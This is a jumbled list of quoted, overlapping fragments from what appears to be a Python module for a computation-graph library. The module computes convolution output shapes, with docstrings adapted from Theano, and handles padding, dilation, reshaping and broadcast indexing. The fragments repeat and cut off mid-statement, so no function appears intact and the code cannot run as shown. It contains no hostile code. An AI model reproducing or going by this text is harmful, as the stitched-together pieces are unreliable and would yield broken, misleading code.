\"\"\" bsize, imshp = image_shape[0], image_shape[2:] convdim", "else: assert s in node_b.shape, f\"Output shape value {s} not in other shapes\"", "= 0 if s in a_map: start = a_map[s] sidx = node_a.shape.index(s, start)", "pm.DEFAULT_SHAPES[0] and node_b.shape == pm.DEFAULT_SHAPES[0]: idx = format_idx([]) return idx, idx, idx elif", "stride=strides[i]),) shape_idx += (pm.index(0, out_shape[i] - 1),) padded = pm.temp(name=name, shape=out_shape) padded[shape_idx] =", "multiple dimensions with the same value cnt = 0 op1 = [] op2", "shape, we want to build the smallest graph # (image_shape + 2 *", "= padding * 2 pad_h = padding[0] * 2 pad_w = padding[1] *", "_get_indices(node, all_indices, tgt_shape): indices = [] if node.shape == pm.DEFAULT_SHAPES[0]: return tuple(indices) for", "# In case of symbolic shape, we want to build the smallest graph", "symbolic shape, we want to build the smallest graph # (image_shape + 2", "correspond to : number of output channels, height and width of the output,", "width of the kernel. None where undefined. border_mode: string, or tuple of int.", "node_b.shape: start = 0 if s in b_map: start = b_map[s] sidx =", "on the considered axis. \"\"\" # Implicit dilated kernel shape dil_kernel_shape = (kernel_shape", "of int corresponding to the kernel shape. For a normal convolution, its four", "2 pad_left = (pad_w + 1) // 2 return pad_top, pad_left, pad_h -", "a string, it must be 'valid' or 'full'. subsample: int. It must correspond", "2 return pad_top, pad_left, pad_h - pad_top, pad_w - pad_left def pad_node(data: pm.Node,", "assert padded_shape == padded_out.shape, f\"Unequal shapes for padding:\\n\" \\ f\"Target shape: {padded_shape}\\n\" \\", "node_b.shape: if i in node_a.shape: idx = node_a.shape.index(i) op2.append(op1[idx]) elif i == 1:", "height and width axis. 
Returns ------- output_shape: tuple of int corresponding to the", "= pm.index(0, data.shape[1]-1) oh_idx = pm.index(0, oh-1) ih_idx = pm.index(0, data.shape[2]-1) ow_idx =", "output image shape. Its four element must correspond respectively to: batch size, number", "# return pad_top, pad_left, pad_h - pad_top, pad_w - pad_left def get_pad_tuple(padding, kernel):", "a given axis. kernel_shape: int Corresponds to the kernel shape on a given", "pad_left = (pad_w + 1) // 2 return pad_top, pad_left, pad_h - pad_top,", "(pm.index(0, out_shape[i] - 1, stride=strides[i]),) shape_idx += (pm.index(0, out_shape[i] - 1),) padded =", "+ add_dim idx_offset = data.shape[d] def _get_indices_for_dim(x, dim): assert len(x.shape) < dim idx", "return indices, indices, indices elif node_a.shape == pm.DEFAULT_SHAPES[0] and node_b.shape == pm.DEFAULT_SHAPES[0]: idx", "= data.shape[d] def _get_indices_for_dim(x, dim): assert len(x.shape) < dim idx = pm.index(0, x.shape[dim]", "idx = 0 idx_offset = 1 add_dim = 0 for d in reversed(dc):", "and node_b.shape == pm.DEFAULT_SHAPES[0]: idx = format_idx([]) return idx, idx, idx elif node_a.shape", "a_idx[i] is None: assert node_a.shape[i] == 1 a_idx[i] = 0 for i in", "depth) axis. filter_dilation: tuple of int. Its two or three elements correspond respectively", "channels must correspond to : number of output channels, height and width of", "// 2 # pad_left = (pad_w + 1) // 2 # return pad_top,", "string, it must be 'valid' or 'full'. subsample: int. 
It must correspond to", "i in enumerate(node.shape): if i != tgt_shape[idx]: indices.insert(idx, 0) return tuple(indices) def _get_binop_idx(node_a,", "= pm.index(0, node_a.shape[i] - 1) a_idx.append(idx) if zero_indices: b_idx.append(0) # TESTING out_idx.append(idx) else:", "pad_size, kernel, pad_val=0): assert len(data.shape) == 4 p_top, p_bottom, p_left, p_right = get_pad_tuple(pad_size,", "False return True # Use numpy broadcasting rules def _get_elem_indices(node_a, node_b, node_c, zero_indices=True):", "= pm.index(0, data.shape[2]-1) ow_idx = pm.index(0, ow-1) iw_idx = pm.index(0, data.shape[3] - 1)", "= (kernel_shape - 1) * dilation + 1 if border_mode == \"full\": pad_l", "None: return dim if dim < 0: dim = len(a_shp) + dim return", "a normal convolution, its four (for 2D convolution) or five (for 3D convolution)", "= node.shape indices = tuple([pm.index(0, s - 1) for s in shape]) return", "elif node_a.shape[i] == 1: idx = pm.index(0, node_b.shape[i] - 1) if zero_indices: a_idx.append(0)", "// subsample + 1 out_shp = image_shape - dil_kernel_shape if pad_l != 0:", "- dil_kernel_shape if pad_l != 0: out_shp += pad_l if pad_r != 0:", "ih_idx + p_top, iw_idx + p_left)] = data[(n_idx, c_idx, ih_idx, iw_idx)] return padded_out", "for i in node_a.shape: if i == 1: op1.append(0) # all_ops.append(0) else: idx", "its four (for 2D convolution) or five (for 3D convolution) elements must correspond", "- 1) op1.append(idx) all_ops.append(idx) cnt += 1 for i in node_b.shape: if i", "padded_out.set_shape(padded_shape) n_idx = pm.index(0, data.shape[0]-1) c_idx = pm.index(0, data.shape[1]-1) oh_idx = pm.index(0, oh-1)", "elif node_a.shape == pm.DEFAULT_SHAPES[0] and node_b.shape == pm.DEFAULT_SHAPES[0]: idx = format_idx([]) return idx,", "[] if node.shape == pm.DEFAULT_SHAPES[0]: return tuple(indices) for idx, i in enumerate(all_indices): if", "(pm.index(0, out_shape[i] - 1),) padded = pm.temp(name=name, shape=out_shape) padded[shape_idx] = 0 padded[(shape_idx[0])] =", 
"width axis. Returns ------- output_shape: tuple of int corresponding to the output image", "its two (or three) elements respectively correspond to the padding on height and", "border_mode, subsample, dilation=1 ): \"\"\"This function compute the output shape of convolution operation.", "= node_a lg_node = node_b nmap[\"small\"] = a_idx nmap[\"large\"] = b_idx for i", "idx_offset = data.shape[d] def _get_indices_for_dim(x, dim): assert len(x.shape) < dim idx = pm.index(0,", "if dim is None: return dim if dim < 0: dim = len(a_shp)", "raise RuntimeError indices = tuple([pm.index(0, s - 1) for s in output.shape]) return", "- 1) for s in output.shape]) return indices def is_broadcastable(shp1, shp2): for a,", "input image shape. Its four (or five) element must correspond respectively to: batch", "- 1) padded_out[(n_idx, c_idx, oh_idx, ow_idx)] = pad_val padded_out[(n_idx, c_idx, ih_idx + p_top,", "def _get_conv_shape_1axis( image_shape, kernel_shape, border_mode, subsample, dilation=1 ): \"\"\"This function compute the output", "input channels, height and width (and possibly depth) of the kernel. For an", "(and possibly depth) of the kernel. For an unshared 2D convolution, its six", "== node.shape[idx]: indices.append(i) if tgt_shape != node.shape: for idx, i in enumerate(node.shape): if", "on height and width axis. Returns ------- output_shape: tuple of int corresponding to", "size on down. pad_right : int Padding size on right. \"\"\" # pad_h", "node_b nmap[\"small\"] = a_idx nmap[\"large\"] = b_idx for i in range(-1, -len(lg_node.shape) -", "a_idx[sidx] = idx a_map[s] = sidx if s in node_b.shape: start = 0", "int. 
Its two or three elements correspond respectively to the dilation on height", "else: if node_a.shape == node_b.shape and node_c.shape == node_a.shape: indices = _get_single_node_indices(node_a) return", "pm.DEFAULT_SHAPES[0]: idx = format_idx([]) return idx, idx, idx elif node_a.shape == pm.DEFAULT_SHAPES[0]: idx", "on left pad_down : int Padding size on down. pad_right : int Padding", "nz_indices += (pm.index(0, out_shape[i] - 1, stride=strides[i]),) shape_idx += (pm.index(0, out_shape[i] - 1),)", "int) # pad_h = pad_w = pad_size * 2 # # pad_top =", "if zero_indices: a_idx.append(0) # TESTING b_idx.append(idx) out_idx.append(idx) elif node_b.shape[i] == 1: idx =", "kernel_shape: tuple of int corresponding to the kernel shape. For a normal convolution,", "correspond to the dilation on the considered axis. Returns ------- out_shp: int corresponding", "is None: assert node_b.shape[i] == 1 b_idx[i] = 0 else: if node_a.shape ==", "out_shp = image_shape - dil_kernel_shape if pad_l != 0: out_shp += pad_l if", "to the input image shape. Its four (or five) element must correspond respectively", "_get_indices_for_dim(x, dim): assert len(x.shape) < dim idx = pm.index(0, x.shape[dim] - 1) return", "+= (pm.index(0, out_shape[i] - 1, stride=strides[i]),) shape_idx += (pm.index(0, out_shape[i] - 1),) padded", "all_ops.append(idx) cnt += 1 if out_node.is_shape_finalized(): all_ops = [] for s in out_node.shape:", "is a string, it must be 'valid' or 'full'. subsample: int. It must", "= pm.index(0, x.shape[dim] - 1) return idx def _dim_explicit(a_shp, dim): if dim is", "0 idx_offset = 1 add_dim = 0 for d in reversed(dc): idx =", "considered axis. 
Returns ------- out_shp: int corresponding to the output image shape on", "pad_val=0): assert len(data.shape) == 4 p_top, p_bottom, p_left, p_right = get_pad_tuple(pad_size, kernel) oh", "cnt += 1 for i in node_b.shape: if i in node_a.shape: idx =", "s - 1) out_idx.append(idx) if s in node_a.shape: start = 0 if s", "= out_shp // subsample out_shp = out_shp + 1 return out_shp def _get_conv_output_shape(", "padded_out def reshape_node(data: pm.Node, reshaped_out: pm.Node, shape: tuple, dim_combinations): assert np.prod(data.shape) == np.prod(shape)", "kernel_shape, border_mode, subsample, dilation=1 ): \"\"\"This function compute the output shape of convolution", "four (for 2D convolution) or five (for 3D convolution) elements must correspond respectively", "= out_shp + 1 return out_shp def _get_conv_output_shape( image_shape, kernel_shape, border_mode, subsample, filter_dilation=(0,", "of convolution operation. Copied and simplified from theano (2020/11/08): https://github.com/Theano/Theano/blob/master/theano/tensor/nnet/abstract_conv.py Parameters ---------- image_shape:", "_get_single_node_indices(node, shape=None): if node.shape == pm.DEFAULT_SHAPES[0]: return tuple([]) else: if not shape: shape", "p_left + p_right padded_shape = (data.shape[0], data.shape[1], oh, ow) if padded_out.is_shape_finalized() and padded_out.shape", "# elif len(pad_size) == 4: # return pad_size[0], pad_size[2], pad_size[1], pad_size[3] # else:", "graph # (image_shape + 2 * pad - dil_kernel_shape) // subsample + 1", "s in node_c.shape: idx = pm.index(0, s - 1) out_idx.append(idx) if s in", "(2020/11/08): https://github.com/Theano/Theano/blob/master/theano/tensor/nnet/abstract_conv.py Parameters ---------- image_shape: tuple of int corresponding to the input image", "it must be 'valid' or 'full'. subsample: int. 
It must correspond to the", "pad_h = padding[0] * 2 pad_w = padding[1] * 2 pad_top = (pad_h", "list)): # if len(pad_size) == 2: # pad_h = pad_size[0] * 2 #", "in range(n): out_shape += ((var.shape[i] - 1) * strides[i] + 1,) nz_indices +=", "len(node.shape) > idx and tgt_shape[idx] == node.shape[idx]: indices.append(i) if tgt_shape != node.shape: for", "considered axis. dilation: int. It must correspond to the dilation on the considered", "if zero_indices: b_idx.append(0) # TESTING out_idx.append(idx) else: raise RuntimeError(f\"Unable to broadcast indices:\\n\" f\"{node_a.name}:", "+= 1 for i in node_b.shape: if i in node_a.shape: idx = node_a.shape.index(i)", "b in zip(shp1[::-1], shp2[::-1]): if a == 1 or b == 1 or", "output channels, number of input channels, height and width (and possibly depth) of", "must correspond respectively to: batch size, number of output channels, height and width", "start = a_map[s] sidx = node_a.shape.index(s, start) a_idx[sidx] = idx a_map[s] = sidx", "* 2 pad_w = padding[1] * 2 pad_top = (pad_h + 1) //", "convolution) elements must correspond respectively to : number of output channels, number of", "if len(node_a.shape) > len(node_b.shape): small_node = node_b lg_node = node_a nmap[\"small\"] = b_idx", "an unshared 2D convolution, its six channels must correspond to : number of", "subsampling on height and width (and possibly depth) axis. filter_dilation: tuple of int.", "2D convolution) or five (for 3D convolution) elements must correspond respectively to :", "It must correspond to the subsampling on the considered axis. dilation: int. It", "def _get_indices(node, all_indices, tgt_shape): indices = [] if node.shape == pm.DEFAULT_SHAPES[0]: return tuple(indices)", "only be 2 or 4\") # else: # assert isinstance(pad_size, int) # pad_h", "it is a string, it must be 'valid' or 'full'. 
If it is", "subsample[i], filter_dilation[i] ) for i in range(len(subsample)) ) return (bsize, nkern) + out_shp", "== 4: # return pad_size[0], pad_size[2], pad_size[1], pad_size[3] # else: # raise ValueError(\"Size", "the subsampling on the considered axis. dilation: int. It must correspond to the", "1: idx3 + shape[3]* for dc in reversed(dim_combinations): idx = 0 idx_offset =", "len(pad_size) == 2: # pad_h = pad_size[0] * 2 # pad_w = pad_size[1]", "= [] dst_indices = [] for s in data.shape: idx = pm.index(0, s-1)", "c_idx = pm.index(0, data.shape[1]-1) oh_idx = pm.index(0, oh-1) ih_idx = pm.index(0, data.shape[2]-1) ow_idx", "depth) of the kernel. For an unshared 2D convolution, its six channels must", "channels, number of input channels, height and width (and possibly depth) of the", "image shape. Its four element must correspond respectively to: batch size, number of", "idx, idx elif node_a.shape == pm.DEFAULT_SHAPES[0]: idx = format_idx([]) indices = _get_single_node_indices(node_b) return", "on right. \"\"\" # pad_h = pad_w = padding * 2 pad_h =", "= pm.index(0, data.shape[0]-1) c_idx = pm.index(0, data.shape[1]-1) oh_idx = pm.index(0, oh-1) ih_idx =", "= pad_r = dil_kernel_shape - 1 elif border_mode == \"valid\": pad_l = pad_r", "idx = pm.index(0, x.shape[dim] - 1) return idx def _dim_explicit(a_shp, dim): if dim", "reversed(dim_combinations): idx = 0 idx_offset = 1 add_dim = 0 for d in", "= (pad_h + 1) // 2 # pad_left = (pad_w + 1) //", "idx, indices, indices elif node_b.shape == pm.DEFAULT_SHAPES[0]: idx = format_idx([]) indices = _get_single_node_indices(node_a)", "and width of the image. 
\"\"\" bsize, imshp = image_shape[0], image_shape[2:] convdim =", "zip(shp1[::-1], shp2[::-1]): if a == 1 or b == 1 or a ==", "0 else: if node_a.shape == node_b.shape and node_c.shape == node_a.shape: indices = _get_single_node_indices(node_a)", "simplified from Theano (2020/11/08): https://github.com/Theano/Theano/blob/master/theano/tensor/nnet/abstract_conv.py Parameters ---------- image_shape: tuple of int corresponding to", "return dim def _get_conv_shape_1axis( image_shape, kernel_shape, border_mode, subsample, dilation=1 ): \"\"\"This function compute", "indices def _get_reduce_node_indices(a, b, output, axis): if output.shape == pm.DEFAULT_SHAPES[0]: return tuple([]) else:", "raise RuntimeError(f\"Unable to broadcast indices:\\n\" f\"{node_a.name}: {node_a.shape}\\n\" f\"{node_b.name}: {node_b.shape}\\n\") return format_idx(a_idx, reverse), format_idx(b_idx,", "TESTING b_idx.append(idx) out_idx.append(idx) elif node_b.shape[i] == 1: idx = pm.index(0, node_a.shape[i] - 1)", "idx_offset = 1 add_dim = 0 for d in reversed(dc): idx = src_indices[d]*idx_offset", "node_a.shape: idx = node_a.shape.index(i) op2.append(op1[idx]) elif i == 1: op2.append(0) # all_ops.append(0) else:", "= a_map[s] sidx = node_a.shape.index(s, start) a_idx[sidx] = idx a_map[s] = sidx if", "= () nz_indices = () shape_idx = () for i in range(n): out_shape", "in range(len(a_idx)): if a_idx[i] is None: assert node_a.shape[i] == 1 a_idx[i] = 0", "== pm.DEFAULT_SHAPES[0]: idx = format_idx([]) indices = _get_single_node_indices(node_b) return idx, indices, indices elif", "- 1) for s in shape]) return indices def _get_reduce_node_indices(a, b, output, axis):", "value cnt = 0 op1 = [] op2 = [] all_ops = []", "shape]) return indices def _get_reduce_node_indices(a, b, output, axis): if output.shape == pm.DEFAULT_SHAPES[0]: return", "height and width (and possibly depth) axis. filter_dilation: tuple of int. 
Its two", "in other shapes\" idx = node_b.shape.index(s) all_ops.append(idx) return op1, op2, all_ops def _get_single_node_indices(node,", "!= node.shape: for idx, i in enumerate(node.shape): if i != tgt_shape[idx]: indices.insert(idx, 0)", "1),) padded = pm.temp(name=name, shape=out_shape) padded[shape_idx] = 0 padded[(shape_idx[0])] = 0 # def", "string or int. If it is a string, it must be 'valid' or", "padded_out: pm.Node, pad_size, kernel, pad_val=0): assert len(data.shape) == 4 p_top, p_bottom, p_left, p_right", "pad_h - pad_top, pad_w - pad_left def pad_node(data: pm.Node, padded_out: pm.Node, pad_size, kernel,", "1) return idx def _dim_explicit(a_shp, dim): if dim is None: return dim if", "return idx, idx, idx elif node_a.shape == pm.DEFAULT_SHAPES[0]: idx = format_idx([]) indices =", "i in range(len(a_idx)): if a_idx[i] is None: assert node_a.shape[i] == 1 a_idx[i] =", "((var.shape[i] - 1) * strides[i] + 1,) nz_indices += (pm.index(0, out_shape[i] - 1,", "if b_idx[i] is None: assert node_b.shape[i] == 1 b_idx[i] = 0 else: if", "kernel size Returns ------- pad_top : int Padding size on top pad_left :", "i - 1) op2.append(idx) all_ops.append(idx) cnt += 1 if out_node.is_shape_finalized(): all_ops = []", "return tuple(list(reversed(x))) else: return tuple(x) def _get_indices(node, all_indices, tgt_shape): indices = [] if", "If it is a tuple, its two (or three) elements respectively correspond to", "!= 1: idx = pm.index(0, node_a.shape[i] - 1) a_idx.append(idx) b_idx.append(idx) out_idx.append(idx) elif node_a.shape[i]", "lg_node.shape[i] - 1) nmap[\"large\"].append(idx) out_idx.append(idx) elif node_a.shape[i] == node_b.shape[i]: if node_a.shape[i] != 1:", "1) // 2 pad_left = (pad_w + 1) // 2 return pad_top, pad_left,", "idx = src_indices[d]*idx_offset + add_dim idx_offset = data.shape[d] def _get_indices_for_dim(x, dim): assert len(x.shape)", "the image. 
\"\"\" bsize, imshp = image_shape[0], image_shape[2:] convdim = len(image_shape) - 2", "else: # assert isinstance(pad_size, int) # pad_h = pad_w = pad_size * 2", "len(image_shape) - 2 nkern, kshp = kernel_shape[0], kernel_shape[-convdim:] if isinstance(border_mode, tuple): out_shp =", "b_map[s] sidx = node_b.shape.index(s, start) b_idx[sidx] = idx b_map[s] = sidx for i", "= format_idx([]) indices = _get_single_node_indices(node_b) return idx, indices, indices elif node_b.shape == pm.DEFAULT_SHAPES[0]:", "a_map[s] = sidx if s in node_b.shape: start = 0 if s in", "(pad_w + 1) // 2 # return pad_top, pad_left, pad_h - pad_top, pad_w", "pm.Node, padded_out: pm.Node, pad_size, kernel, pad_val=0): assert len(data.shape) == 4 p_top, p_bottom, p_left,", "format_idx([]) indices = _get_single_node_indices(node_a) return indices, idx, indices if len(node_a.shape) > len(node_b.shape): small_node", "Copied and simplified from theano (2020/11/08): https://github.com/Theano/Theano/blob/master/theano/tensor/nnet/abstract_conv.py Parameters ---------- image_shape: int Corresponds to", "= tuple( _get_conv_shape_1axis( imshp[i], kshp[i], border_mode, subsample[i], filter_dilation[i] ) for i in range(len(subsample))", "data.shape: idx = pm.index(0, s-1) src_indices.append(idx) # STEP 0: idx3*1 + 0 #", "+ p_bottom ow = data.shape[3] + p_left + p_right padded_shape = (data.shape[0], data.shape[1],", "pm.Node, shape: tuple, dim_combinations): assert np.prod(data.shape) == np.prod(shape) assert len(dim_combinations) == len(shape) src_indices", "= pad_r = 0 else: assert border_mode >= 0 pad_l = pad_r =", "height and width (and possibly depth) of the image. None where undefined. kernel_shape:", "1) a_idx.append(idx) if zero_indices: b_idx.append(0) # TESTING out_idx.append(idx) else: raise RuntimeError(f\"Unable to broadcast", "where undefined. border_mode: string, or tuple of int. 
If it is a string,", "tuple): out_shp = tuple( _get_conv_shape_1axis( imshp[i], kshp[i], border_mode[i], subsample[i], filter_dilation[i], ) for i", "return indices def is_broadcastable(shp1, shp2): for a, b in zip(shp1[::-1], shp2[::-1]): if a", "dilated kernel shape dil_kernel_shape = (kernel_shape - 1) * dilation + 1 if", "assert len(dim_combinations) == len(shape) src_indices = [] dst_indices = [] for s in", "[] for s in out_node.shape: if s in node_a.shape: idx = node_a.shape.index(s) all_ops.append(idx)", "of int Conv kernel size Returns ------- pad_top : int Padding size on", "= [] if node.shape == pm.DEFAULT_SHAPES[0]: return tuple(indices) for idx, i in enumerate(all_indices):", "2D convolution, its six channels must correspond to : number of output channels,", "0 # STEP 1: idx3 + shape[3]* for dc in reversed(dim_combinations): idx =", "the output, number of input channels, height and width of the kernel. None", "= pad_val padded_out[(n_idx, c_idx, ih_idx + p_top, iw_idx + p_left)] = data[(n_idx, c_idx,", "left pad_down : int Padding size on down. pad_right : int Padding size", "i in range(n): out_shape += ((var.shape[i] - 1) * strides[i] + 1,) nz_indices", "format_idx(b_idx, reverse), format_idx(out_idx, reverse) def dilate(var: pm.placeholder, strides, name=None): n = len(var.shape) assert", ": int Padding size on left pad_down : int Padding size on down.", "batch size, number of input channels, height and width (and possibly depth) of", "possibly depth) axis. subsample: tuple of int. Its two or three elements respectively", "int Padding size on down. pad_right : int Padding size on right. \"\"\"", "3D convolution) elements must correspond respectively to : number of output channels, number", "considered axis. 
\"\"\" # Implicit dilated kernel shape dil_kernel_shape = (kernel_shape - 1)", "for i in range(n): out_shape += ((var.shape[i] - 1) * strides[i] + 1,)", "= node_a.shape.index(s, start) a_idx[sidx] = idx a_map[s] = sidx if s in node_b.shape:", "return dim if dim < 0: dim = len(a_shp) + dim return dim", "of input channels, height and width of the kernel. None where undefined. border_mode:", "correspond respectively to: batch size, number of output channels, height and width of", "== node_b.shape and node_c.shape == node_a.shape: indices = _get_single_node_indices(node_a) return indices, indices, indices", "p_top, iw_idx + p_left)] = data[(n_idx, c_idx, ih_idx, iw_idx)] return padded_out def reshape_node(data:", "idx3*1 + 0 # STEP 1: idx3 + shape[3]* for dc in reversed(dim_combinations):", "rules def _get_elem_indices(node_a, node_b, node_c, zero_indices=True): broadcastable = is_broadcastable(node_a.shape, node_b.shape) a_idx = []", "idx, indices if len(node_a.shape) > len(node_b.shape): small_node = node_b lg_node = node_a nmap[\"small\"]", "idx = pm.index(0, s-1) src_indices.append(idx) # STEP 0: idx3*1 + 0 # STEP", "to the dilation on height and width axis. Returns ------- output_shape: tuple of", "pad_h = pad_w = padding * 2 pad_h = padding[0] * 2 pad_w", "= [] out_idx = [] nmap = {} reverse = True if not", "!= 1: out_shp = out_shp // subsample out_shp = out_shp + 1 return", "# TODO: Figure out what to do about multiple dimensions with the same", "start = 0 if s in b_map: start = b_map[s] sidx = node_b.shape.index(s,", "pad_h = pad_size[0] * 2 # pad_w = pad_size[1] * 2 # elif", "of int. If it is a string, it must be 'valid' or 'full'.", "= b_map[s] sidx = node_b.shape.index(s, start) b_idx[sidx] = idx b_map[s] = sidx for", "and width (and possibly depth) of the image. None where undefined. 
kernel_shape: tuple", "all_ops def _get_single_node_indices(node, shape=None): if node.shape == pm.DEFAULT_SHAPES[0]: return tuple([]) else: if not", "# else: # raise ValueError(\"Size of padding can only be 2 or 4\")", "normal convolution, its four (for 2D convolution) or five (for 3D convolution) elements", "dst_indices = [] for s in data.shape: idx = pm.index(0, s-1) src_indices.append(idx) #", "= [] b_idx = [] out_idx = [] nmap = {} reverse =", "to the output image shape. Its four element must correspond respectively to: batch", "1: idx = pm.index(0, node_a.shape[i] - 1) a_idx.append(idx) b_idx.append(idx) out_idx.append(idx) elif node_a.shape[i] ==", "in enumerate(node.shape): if i != tgt_shape[idx]: indices.insert(idx, 0) return tuple(indices) def _get_binop_idx(node_a, node_b,", "it is a string, it must be 'valid' or 'full'. subsample: int. It", "assert len(x.shape) < dim idx = pm.index(0, x.shape[dim] - 1) return idx def", "the considered axis. \"\"\" # Implicit dilated kernel shape dil_kernel_shape = (kernel_shape -", "size on top pad_left : int Padding size on left pad_down : int", "corresponding to the kernel shape. 
For a normal convolution, its four (for 2D", "node_a.shape[i] == node_b.shape[i]: if node_a.shape[i] != 1: idx = pm.index(0, node_a.shape[i] - 1)", "+ 1 if border_mode == \"full\": pad_l = pad_r = dil_kernel_shape - 1", "zero_indices: b_idx.append(0) # TESTING out_idx.append(idx) else: raise RuntimeError(f\"Unable to broadcast indices:\\n\" f\"{node_a.name}: {node_a.shape}\\n\"", "node_a.shape: idx = node_a.shape.index(s) all_ops.append(idx) else: assert s in node_b.shape, f\"Output shape value", "- 1) * strides[i] + 1,) nz_indices += (pm.index(0, out_shape[i] - 1, stride=strides[i]),)", "assert node_a.shape[i] == 1 a_idx[i] = 0 for i in range(len(b_idx)): if b_idx[i]", "padded = pm.temp(name=name, shape=out_shape) padded[shape_idx] = 0 padded[(shape_idx[0])] = 0 # def get_pad_tuple(pad_size):", "padding:\\n\" \\ f\"Target shape: {padded_shape}\\n\" \\ f\"Set shape: {padded_out.shape}\" padded_out.set_shape(padded_shape) n_idx = pm.index(0,", "(or five) element must correspond respectively to: batch size, number of input channels,", "data[(n_idx, c_idx, ih_idx, iw_idx)] return padded_out def reshape_node(data: pm.Node, reshaped_out: pm.Node, shape: tuple,", "or int. If it is a string, it must be 'valid' or 'full'.", "the considered axis. dilation: int. It must correspond to the dilation on the", "else: if not shape: shape = node.shape indices = tuple([pm.index(0, s - 1)", "ow) if padded_out.is_shape_finalized() and padded_out.shape != (1,): assert padded_shape == padded_out.shape, f\"Unequal shapes", "2 # elif len(pad_size) == 4: # return pad_size[0], pad_size[2], pad_size[1], pad_size[3] #", "function compute the output shape of convolution operation. 
Copied and simplified from Theano", "b_idx.append(0) # TESTING out_idx.append(idx) else: raise RuntimeError(f\"Unable to broadcast indices:\\n\" f\"{node_a.name}: {node_a.shape}\\n\" f\"{node_b.name}:", "\"full\": pad_l = pad_r = dil_kernel_shape - 1 elif border_mode == \"valid\": pad_l", "must correspond respectively to : number of output channels, number of input channels,", "dil_kernel_shape - 1 elif border_mode == \"valid\": pad_l = pad_r = 0 else:", "Implicit dilated kernel shape dil_kernel_shape = (kernel_shape - 1) * dilation + 1", "compute the output shape of convolution operation. Copied and simplified from Theano (2020/11/08):", "['VALID', 'SAME'] kernel : tuple of int Conv kernel size Returns ------- pad_top", "p_left)] = data[(n_idx, c_idx, ih_idx, iw_idx)] return padded_out def reshape_node(data: pm.Node, reshaped_out: pm.Node,", "(data.shape[0], data.shape[1], oh, ow) if padded_out.is_shape_finalized() and padded_out.shape != (1,): assert padded_shape ==", "len(shape) src_indices = [] dst_indices = [] for s in data.shape: idx =", "out_shp // subsample out_shp = out_shp + 1 return out_shp def _get_conv_output_shape( image_shape,", "pad_l = pad_r = 0 else: assert border_mode >= 0 pad_l = pad_r", "in enumerate(all_indices): if len(node.shape) > idx and tgt_shape[idx] == node.shape[idx]: indices.append(i) if tgt_shape", "Returns ------- output_shape: tuple of int corresponding to the output image shape. Its", "the dilation on height and width axis. 
Returns ------- output_shape: tuple of int", "\\ f\"Set shape: {padded_out.shape}\" padded_out.set_shape(padded_shape) n_idx = pm.index(0, data.shape[0]-1) c_idx = pm.index(0, data.shape[1]-1)", "output channels, height and width of the output, number of input channels, height", "node_b.shape) a_idx = [] b_idx = [] out_idx = [] nmap = {}", "not broadcastable: reverse = False a_idx = [None] * len(node_a.shape) b_idx = [None]", "= pad_size[1] * 2 # elif len(pad_size) == 4: # return pad_size[0], pad_size[2],", "output.shape: raise RuntimeError indices = tuple([pm.index(0, s - 1) for s in output.shape])", "0 else: assert border_mode >= 0 pad_l = pad_r = border_mode # In", "i in range(len(b_idx)): if b_idx[i] is None: assert node_b.shape[i] == 1 b_idx[i] =", "{node_b.shape}\\n\") return format_idx(a_idx, reverse), format_idx(b_idx, reverse), format_idx(out_idx, reverse) def dilate(var: pm.placeholder, strides, name=None):", "1) // 2 return pad_top, pad_left, pad_h - pad_top, pad_w - pad_left def", "0: idx3*1 + 0 # STEP 1: idx3 + shape[3]* for dc in", "axis. kernel_shape: int Corresponds to the kernel shape on a given axis. border_mode:", "five) element must correspond respectively to: batch size, number of input channels, height", "= a_idx nmap[\"large\"] = b_idx for i in range(-1, -len(lg_node.shape) - 1, -1):", "subsampling on the considered axis. dilation: int. It must correspond to the dilation", "pad - dil_kernel_shape) // subsample + 1 out_shp = image_shape - dil_kernel_shape if", "axis. subsample: tuple of int. Its two or three elements respectively correspond to", "* pad - dil_kernel_shape) // subsample + 1 out_shp = image_shape - dil_kernel_shape", "shape: {padded_shape}\\n\" \\ f\"Set shape: {padded_out.shape}\" padded_out.set_shape(padded_shape) n_idx = pm.index(0, data.shape[0]-1) c_idx =", "pad_size[1], pad_size[3] # else: # raise ValueError(\"Size of padding can only be 2", "tuple of int. 
Its two or three elements correspond respectively to the dilation", "node_b.shape[i]: if node_a.shape[i] != 1: idx = pm.index(0, node_a.shape[i] - 1) a_idx.append(idx) b_idx.append(idx)", "node_a.shape: indices = _get_single_node_indices(node_a) return indices, indices, indices elif node_a.shape == pm.DEFAULT_SHAPES[0] and", "idx = node_a.shape.index(i) op2.append(op1[idx]) elif i == 1: op2.append(0) # all_ops.append(0) else: idx", "= dil_kernel_shape - 1 elif border_mode == \"valid\": pad_l = pad_r = 0", "return tuple(indices) for idx, i in enumerate(all_indices): if len(node.shape) > idx and tgt_shape[idx]", "= node_b.shape.index(s, start) b_idx[sidx] = idx b_map[s] = sidx for i in range(len(a_idx)):", "= 1 add_dim = 0 for d in reversed(dc): idx = src_indices[d]*idx_offset +", "def _get_reduce_node_indices(a, b, output, axis): if output.shape == pm.DEFAULT_SHAPES[0]: return tuple([]) else: if", "op2.append(0) # all_ops.append(0) else: idx = pm.index(0, i - 1) op2.append(idx) all_ops.append(idx) cnt", "assert np.prod(data.shape) == np.prod(shape) assert len(dim_combinations) == len(shape) src_indices = [] dst_indices =", "shapes for padding:\\n\" \\ f\"Target shape: {padded_shape}\\n\" \\ f\"Set shape: {padded_out.shape}\" padded_out.set_shape(padded_shape) n_idx", "!= tgt_shape[idx]: indices.insert(idx, 0) return tuple(indices) def _get_binop_idx(node_a, node_b, out_node): # TODO: Figure", "pad_w - pad_left def get_pad_tuple(padding, kernel): \"\"\"Common code to get the pad option", "---------- padding : int or str Padding size, or ['VALID', 'SAME'] kernel :", "def _get_conv_output_shape( image_shape, kernel_shape, border_mode, subsample, filter_dilation=(0, 0) ): \"\"\"This function compute the", "= {} reverse = True if not broadcastable: reverse = False a_idx =", "border_mode: string, or tuple of int. If it is a string, it must", "int corresponding to the output image shape on the considered axis. \"\"\" #", "output shape of convolution operation. 
